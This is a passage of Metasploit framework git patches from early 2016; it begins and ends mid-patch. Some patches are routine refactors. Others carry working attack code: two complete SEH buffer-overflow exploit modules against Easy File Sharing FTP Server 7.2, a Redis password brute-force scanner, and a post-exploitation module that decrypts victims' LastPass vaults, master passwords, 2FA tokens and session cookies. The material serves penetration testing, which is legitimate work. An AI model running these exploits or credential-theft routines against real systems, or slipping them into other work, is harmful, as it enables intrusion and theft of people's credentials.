Exploit::Remote::Tcp ) end - # Returns the rhost:rport - def peer - "#{rhost}:#{rport}" - end - # # Establishes a TCP connection to the specified RHOST/RPORT # @@ -207,17 +202,24 @@ module Exploit::Remote::Tcp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the TCP connection timeout # - def rport - datastore['RPORT'] + def connect_timeout + datastore['ConnectTimeout'] + end + + # + # Returns the local port for outgoing connections + # + def cport + datastore['CPORT'] end # @@ -234,18 +236,30 @@ module Exploit::Remote::Tcp datastore['LPORT'] end - # - # Returns the local host for outgoing connections - # - def chost - datastore['CHOST'] + # Returns the rhost:rport + def peer + "#{rhost}:#{rport}" end # - # Returns the local port for outgoing connections + # Returns the proxy configuration # - def cport - datastore['CPORT'] + def proxies + datastore['Proxies'] + end + + # + # Returns the target host + # + def rhost + datastore['RHOST'] + end + + # + # Returns the remote port + # + def rport + datastore['RPORT'] end # @@ -262,20 +276,6 @@ module Exploit::Remote::Tcp datastore['SSLVersion'] end - # - # Returns the proxy configuration - # - def proxies - datastore['Proxies'] - end - - # - # Returns the TCP connection timeout - # - def connect_timeout - datastore['ConnectTimeout'] - end - # # Returns the SSL certification verification mechanism # From a7869975d8b65cb85ec6509a6e98530c943be541 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 10:04:23 -0600 Subject: [PATCH 197/686] Remove useless variable --- lib/msf/core/module/ui/message.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index 7370ded212..bf4d228abc 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -13,11 +13,11 @@ module Msf::Module::UI::Message end def print_prefix - ret = '' + prefix = '' if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i ) - prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " + prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] xn ||= framework.datastore['ExploitNumber'] @@ -25,9 +25,8 @@ module Msf::Module::UI::Message prefix << "[%04d] " % xn end - ret = prefix end - ret + prefix end def print_status(msg='') @@ -37,4 +36,4 @@ module Msf::Module::UI::Message def print_warning(msg='') super(print_prefix + msg) end -end \ No newline at end of file +end From 348ae586a71c8bcbdc160fd72a1863f7684bc400 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Fri, 15 Jan 2016 14:54:59 -0800 Subject: [PATCH 198/686] Handle vault parsing exceptions --- modules/post/multi/gather/lastpass_creds.rb | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 91afe5d444..e2c21c628e 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -697,12 +697,17 @@ class Metasploit3 < Msf::Post labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] vault_data = [] for label in labels - length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) - encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] - label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") - decrypted_data = "" if decrypted_data.nil? - vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") - pointer = pointer + 4 + length + begin + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] + label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data.nil? + vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + pointer = pointer + 4 + length + rescue + vprint_error "Vault account could not be parsed" + return nil + end end return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes end From 98cfd2de900a53166ad1f5b6b1157cdc32d1368b Mon Sep 17 00:00:00 2001 From: nixawk Date: Sat, 16 Jan 2016 12:42:15 +0800 Subject: [PATCH 199/686] remove PING authentication --- .../framework/login_scanner/redis.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/redis.rb b/lib/metasploit/framework/login_scanner/redis.rb index b190d81ae0..c60b3c573f 100644 --- a/lib/metasploit/framework/login_scanner/redis.rb +++ b/lib/metasploit/framework/login_scanner/redis.rb @@ -50,18 +50,20 @@ module Metasploit connect select([sock], nil, nil, 0.4) - command = redis_proto(['PING']) + command = redis_proto(['AUTH', "#{credential.private}"]) sock.put(command) result_options[:proof] = sock.get_once - if result_options[:proof] && result_options[:proof] =~ /(?ERR operation not permitted|NOAUTH Authentication required)/i - command = redis_proto(['AUTH', "#{credential.private}"]) - sock.put(command) - result_options[:proof] = sock.get_once(-1, 16) + # No password - ( -ERR Client sent AUTH, but no password is set\r\n ) + # Invalid password - ( -ERR invalid password\r\n ) + # Valid password - (+OK\r\n) - if result_options[:proof] && result_options[:proof][/^\+OK/] - result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL - end + if result_options[:proof] && result_options[:proof] =~ /but no password is set/i + result_options[:status] = Metasploit::Model::Login::Status::NO_AUTH_REQUIRED + elsif result_options[:proof] && result_options[:proof] =~ /^-ERR invalid password/i + result_options[:status] = Metasploit::Model::Login::Status::INCORRECT + elsif result_options[:proof] && result_options[:proof][/^\+OK/] + result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL end rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e From 2abaca3f6b617c765040d06c6513552088040103 Mon Sep 17 00:00:00 2001 From: nixawk Date: Sat, 16 Jan 2016 12:58:02 +0800 Subject: [PATCH 200/686] include Msf::Auxiliary::Redis / Remove default RPORT option --- modules/auxiliary/scanner/redis/redis_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index 626efb5136..cf01f22d0a 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -9,6 +9,7 @@ require 'metasploit/framework/credential_collection' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Redis include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute @@ -27,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - Opt::RPORT(6379), OptPath.new('PASS_FILE', [ false, From b2983e1ee704ee1ab309fbc011e441ee1ca1c442 Mon Sep 17 00:00:00 2001 From: nixawk Date: Sat, 16 Jan 2016 13:05:35 +0800 Subject: [PATCH 201/686] replace #{rhost}: #{rport} with #{peer} --- modules/auxiliary/scanner/redis/redis_login.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index cf01f22d0a..ceee88b664 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -82,10 +82,14 @@ class Metasploit3 < Msf::Auxiliary credential_data[:core] = credential_core create_credential_login(credential_data) - print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" + if datastore['VERBOSE'] + vprint_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential} (#{result.status}: #{result.proof})" + else + print_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential}" + end else invalidate_login(credential_data) - vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" end end end From 0b78406d2958823961f31c3af3c30244ca155fa4 Mon Sep 17 00:00:00 2001 From: nixawk Date: Sat, 16 Jan 2016 13:12:04 +0800 Subject: [PATCH 202/686] clear Metasploit::Framework::LoginScanner::REDIS.new --- modules/auxiliary/scanner/redis/redis_login.rb | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index ceee88b664..12ccb1fdf8 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -55,19 +55,10 @@ class Metasploit3 < Msf::Auxiliary scanner = Metasploit::Framework::LoginScanner::REDIS.new( host: ip, port: rport, - ssl: datastore['SSL'], + proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], - bruteforce_speed: datastore['BRUTEFORCE_SPEED'], - max_send_size: datastore['TCP::max_send_size'], - send_delay: datastore['TCP::send_delay'], - framework: framework, - framework_module: self, - ssl_version: datastore['SSLVersion'], - ssl_verify_mode: datastore['SSLVerifyMode'], - ssl_cipher: datastore['SSLCipher'], - local_port: datastore['CPORT'], - local_host: datastore['CHOST'] + connection_timeout: 30 ) scanner.scan! do |result| From ad107a2d1c612cd7f691027939a21c372bc7905e Mon Sep 17 00:00:00 2001 From: nixawk Date: Tue, 19 Jan 2016 08:29:33 +0800 Subject: [PATCH 203/686] Show - No Auth Required - Just Once --- modules/auxiliary/scanner/redis/redis_login.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index 12ccb1fdf8..4583e84bb0 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -68,7 +68,8 @@ class Metasploit3 < Msf::Auxiliary workspace_id: myworkspace_id ) - if result.success? + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) @@ -78,6 +79,9 @@ class Metasploit3 < Msf::Auxiliary else print_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential}" end + when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + break else invalidate_login(credential_data) vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" From 6c2391ed0da649d73a1e63c60f3f0744c85583b1 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 19 Jan 2016 15:37:10 +1000 Subject: [PATCH 204/686] Fix typo in random xor key generator --- lib/rex/post/meterpreter/packet.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 423f8880d2..36ae8e8ed8 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -675,8 +675,8 @@ class Packet < GroupTlv raw = super xor_key = rand(254) + 1 xor_key |= (rand(254) + 1) << 8 - xor_key |= (rand(255) + 1) << 16 - xor_key |= (rand(255) + 1) << 24 + xor_key |= (rand(254) + 1) << 16 + xor_key |= (rand(254) + 1) << 24 result = [xor_key].pack('N') + xor_bytes(xor_key, raw) result end From 0f7e3e954e6f16b810c590ced1277aedead36756 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 20 Jan 2016 13:44:18 -0600 Subject: [PATCH 205/686] HttpServer's print prefix with... wait for it... print_prefix --- lib/msf/core/exploit.rb | 4 +- lib/msf/core/exploit/http/server.rb | 59 +++-------------------------- 2 files changed, 8 insertions(+), 55 deletions(-) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index e2d2bbc5d1..7e36ad1a80 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -649,14 +649,14 @@ class Exploit < Msf::Module # Returns true if the exploit has an aggressive stance. # def aggressive? - (stance == Stance::Aggressive) + (stance == Stance::Aggressive || stance.include?(Stance::Aggressive)) end # # Returns if the exploit has a passive stance. # def passive? - (stance == Stance::Passive) + (stance == Stance::Passive || stance.include?(Stance::Passive)) end # diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b58eb8a4a..d500a1b336 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -72,60 +72,13 @@ module Exploit::Remote::HttpServer Thread.current[:cli] = cli end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super + def print_prefix + if cli && !aggressive? + super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " + else + super + end end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # # Ensures that gzip can be used. If not, an exception is generated. The From 9b438762703e90cb2a6a21ff2ffc40502c98b8ae Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 Date: Wed, 20 Jan 2016 18:18:00 -0500 Subject: [PATCH 206/686] Create EasyFileSharing_SEH.rb --- .../windows/ftp/EasyFileSharing_SEH.rb | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 modules/exploits/windows/ftp/EasyFileSharing_SEH.rb diff --git a/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb b/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb new file mode 100644 index 0000000000..ea1e0f5224 --- /dev/null +++ b/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb @@ -0,0 +1,63 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal', { 'Ret' => "\x98\x97\x01\x10" } ], + ], + 'DisclosureDate' => 'December 2, 2015', + 'DefaultTarget' => 0)) + end + + def exploit + connect + print_status("Generating Shell Code") + sploit = rand_text_alpha_upper(4061) + sploit << "\xeb\x0A\x90\x90" + sploit << target.ret + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) + sploit << " HTTP/1.0\r\n\r\n" + send_cmd(['GET ', sploit], true) + print_good("Exploit Sent") + handler + disconnect + end + +end From ac0b489a90d112287825ec8e96667affb96882d8 Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 21 Jan 2016 10:28:38 +1000 Subject: [PATCH 207/686] Revert bad merge and include expect calls --- spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 8610f5d3f4..1497ebaa9e 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -19,9 +19,9 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do end it "should initialise with expected defaults" do - parser.send(:raw).to eq "" - parser.send(:hdr_length_left).to eq 12 - parser.send(:payload_length_left).to eq 0 + expect(parser.send(:raw)).to eq "" + expect(parser.send(:hdr_length_left)).to eq 12 + expect(parser.send(:payload_length_left)).to eq 0 end it "should parse valid raw data into a packet object" do From bda76c7340677bf0d64b02fde4eb1f953df48996 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 21 Jan 2016 00:53:16 -0600 Subject: [PATCH 208/686] Update lastpass_creds module --- modules/post/multi/gather/lastpass_creds.rb | 115 +++++++++++--------- 1 file changed, 66 insertions(+), 49 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index e2c21c628e..3f7707ee4a 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -1,5 +1,9 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' -require 'base64' require 'sqlite3' require 'uri' require 'rex' @@ -11,22 +15,26 @@ class Metasploit3 < Msf::Post include Msf::Post::Unix def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'LastPass Vault Decryptor', - 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords, encryption keys, 2FA tokens and all the vault passwords', - 'License' => MSF_LICENSE, - 'Author' => [ + super(update_info(info, + 'Name' => 'LastPass Vault Decryptor', + 'Description' => %q{ + This module extracts and decrypts LastPass master login accounts and passwords, + encryption keys, 2FA tokens and all the vault passwords + }, + 'License' => MSF_LICENSE, + 'Author' => + [ 'Alberto Garcia Illera ', # original module and research 'Martin Vigo ', # original module and research - 'Jon Hart %w(linux osx unix win), - 'References' => [['URL', 'http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it']], - 'SessionTypes' => %w(meterpreter shell) - ) - ) + 'Platform' => %w(linux osx unix win), + 'References' => + [ + [ 'URL', 'http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it' ] + ], + 'SessionTypes' => %w(meterpreter shell) + )) end def run @@ -241,7 +249,7 @@ class Metasploit3 < Msf::Post # Extract master passwords data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginPws") - data = Base64.encode64(data) unless data.blank? + data = Rex::Text.encode_base64(data) unless data.blank? else # Firefox loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") return [] unless loot_path @@ -278,7 +286,7 @@ class Metasploit3 < Msf::Post if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") - decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | + decipher.iv = Rex::Text.decode_base64(encrypted_data[1, 24]) # Discard ! and | encrypted_data = encrypted_data[26..-1] # Take only the data part else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") @@ -287,9 +295,9 @@ class Metasploit3 < Msf::Post begin decipher.decrypt decipher.key = key - decrypted_data = decipher.update(Base64.decode64(encrypted_data)) + decipher.final - rescue - vprint_error "Data could not be decrypted" + decrypted_data = decipher.update(Rex::Text.decode_base64(encrypted_data)) + decipher.final + rescue OpenSSL::Cipher::CipherError => e + vprint_error "Data could not be decrypted. #{e.message}" end decrypted_data @@ -396,7 +404,7 @@ class Metasploit3 < Msf::Post if browser.match(/Firefox|IE/) if browser == "Firefox" iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" - vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" else # IE iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" @@ -461,12 +469,12 @@ class Metasploit3 < Msf::Post end # Decrypt the locally stored vault key - def decrypt_local_vault_key account, browser_map + def decrypt_local_vault_key(account, browser_map) data = nil session_cookie_value = nil browser_map.each_pair do |browser, lp_data| - if browser == "IE" + if browser == "IE" && directory?(lp_data['cookies_db']) cookies_files = dir(lp_data['cookies_db']) cookies_files.reject! { |u| %w(. ..).include?(u) } cookies_files.each do |cookie_jar_file| @@ -496,8 +504,8 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(loot_path) begin result = db.execute(query) - rescue - vprint_error "No session cookie was found in #{account}'s #{browser}" + rescue SQLite3::SQLException => e + vprint_error "No session cookie was found in #{account}'s #{browser} (#{e.message})" next end next if result.blank? # No session cookie found for this browser @@ -506,18 +514,18 @@ class Metasploit3 < Msf::Post return if session_cookie_value.blank? # Check if cookie value needs to be decrypted - if Base64.encode64(session_cookie_value).match(/^AQAAA.+/) # Windows Data protection API - session_cookie_value = windows_unprotect(Base64.encode64(session_cookie_value)) + if Rex::Text.encode_base64(session_cookie_value).match(/^AQAAA.+/) # Windows Data protection API + session_cookie_value = windows_unprotect(Rex::Text.encode_base64(session_cookie_value)) elsif session_cookie_value.match(/^v10/) && browser.match(/Chrome|Opera/) # Chrome/Opera encrypted cookie in Linux - decipher = OpenSSL::Cipher.new("AES-256-CBC") - decipher.decrypt - decipher.key = OpenSSL::Digest::SHA256.hexdigest("peanuts") - decipher.iv = " " * 16 - session_cookie_value = session_cookie_value[3..-1] # Discard v10 begin + decipher = OpenSSL::Cipher.new("AES-256-CBC") + decipher.decrypt + decipher.key = OpenSSL::Digest::SHA256.hexdigest("peanuts") + decipher.iv = " " * 16 + session_cookie_value = session_cookie_value[3..-1] # Discard v10 session_cookie_value = decipher.update(session_cookie_value) + decipher.final - rescue - print_error "Cookie could not be decrypted" + rescue OpenSSL::Cipher::CipherError => e + print_error "Cookie could not be decrypted. #{e.message}" end end @@ -625,7 +633,7 @@ class Metasploit3 < Msf::Post end def windows_unprotect(data) - data = Base64.decode64(data) + data = Rex::Text.decode_base64(data) rg = session.railgun pid = session.sys.process.getpid process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) @@ -675,7 +683,7 @@ class Metasploit3 < Msf::Post end # Parse vault - vault = Base64.decode64(encoded_vault) + vault = Rex::Text.decode_base64(encoded_vault) vault.scan(/ACCT/) do |result| chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1] + 3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk chunk = vault[$~.offset(0)[0]..$~.offset(0)[1] + chunk_length] # Get ACCT chunk @@ -684,7 +692,11 @@ class Metasploit3 < Msf::Post end unless account_map.empty? # Loot passwords - print_good lastpass_vault_data_table.to_s + if lastpass_vault_data_table.rows.empty? + print_status('No decrypted vaults.') + else + print_good lastpass_vault_data_table.to_s + end loot_file(nil, lastpass_vault_data_table.to_csv, "#{browser.downcase}.lastpass.passwords", "text/csv", "LastPass Vault Passwords from #{username}") end end @@ -697,18 +709,23 @@ class Metasploit3 < Msf::Post labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] vault_data = [] for label in labels - begin - length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) - encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] - label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") - decrypted_data = "" if decrypted_data.nil? - vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") - pointer = pointer + 4 + length - rescue - vprint_error "Vault account could not be parsed" + #if chunk[pointer..pointer + 3].nil? + # vprint_error "Vault account could not be parsed" + # return nil + #end + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] + label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data.nil? + vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") + pointer = pointer + 4 + length + + if chunk[pointer..pointer + 3].nil? + # Out of bound read return nil end end + return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes end @@ -727,8 +744,8 @@ class Metasploit3 < Msf::Post begin return decipher.update(encrypted_data) + decipher.final - rescue - vprint_error "Vault password could not be decrypted" + rescue OpenSSL::Cipher::CipherError + vprint_error "Vault password could not be decrypted with key #{key}" return nil end end @@ -768,8 +785,8 @@ class Metasploit3 < Msf::Post return nil unless reg_key reg_value = reg_key.query_value(value) return nil unless reg_value - rescue - vprint_error "Error reading registry key #{key} and value #{value}" + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error("#{e.message} (#{key}\\#{value})") end reg_key.close if reg_key return reg_value.blank? ? nil : reg_value.data From d515e4db64599bbec46b796319c6868497e8235d Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 21 Jan 2016 00:55:08 -0600 Subject: [PATCH 209/686] Unwanted comment --- modules/post/multi/gather/lastpass_creds.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 3f7707ee4a..7e84160e33 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -709,10 +709,6 @@ class Metasploit3 < Msf::Post labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] vault_data = [] for label in labels - #if chunk[pointer..pointer + 3].nil? - # vprint_error "Vault account could not be parsed" - # return nil - #end length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") From 1a808780546360a272576c9b1ab05b0a3b2ac65f Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 Date: Thu, 21 Jan 2016 13:46:43 -0500 Subject: [PATCH 210/686] Create easyfilesharing_seh.rb --- .../windows/misc/easyfilesharing_seh.rb | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 modules/exploits/windows/misc/easyfilesharing_seh.rb diff --git a/modules/exploits/windows/misc/easyfilesharing_seh.rb b/modules/exploits/windows/misc/easyfilesharing_seh.rb new file mode 100644 index 0000000000..093ed88665 --- /dev/null +++ b/modules/exploits/windows/misc/easyfilesharing_seh.rb @@ -0,0 +1,64 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal', { 'Ret' => 0x10019798 } ], + ], + 'DisclosureDate' => 'December 2, 2015', + 'DefaultTarget' => 0)) + end + + def exploit + connect + print_status("Generating Shell Code") + sploit = "GET " + sploit << rand_text_alpha_upper(4061) + print_status("Generating Short jump") + sploit << generate_seh_record(target.ret) + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 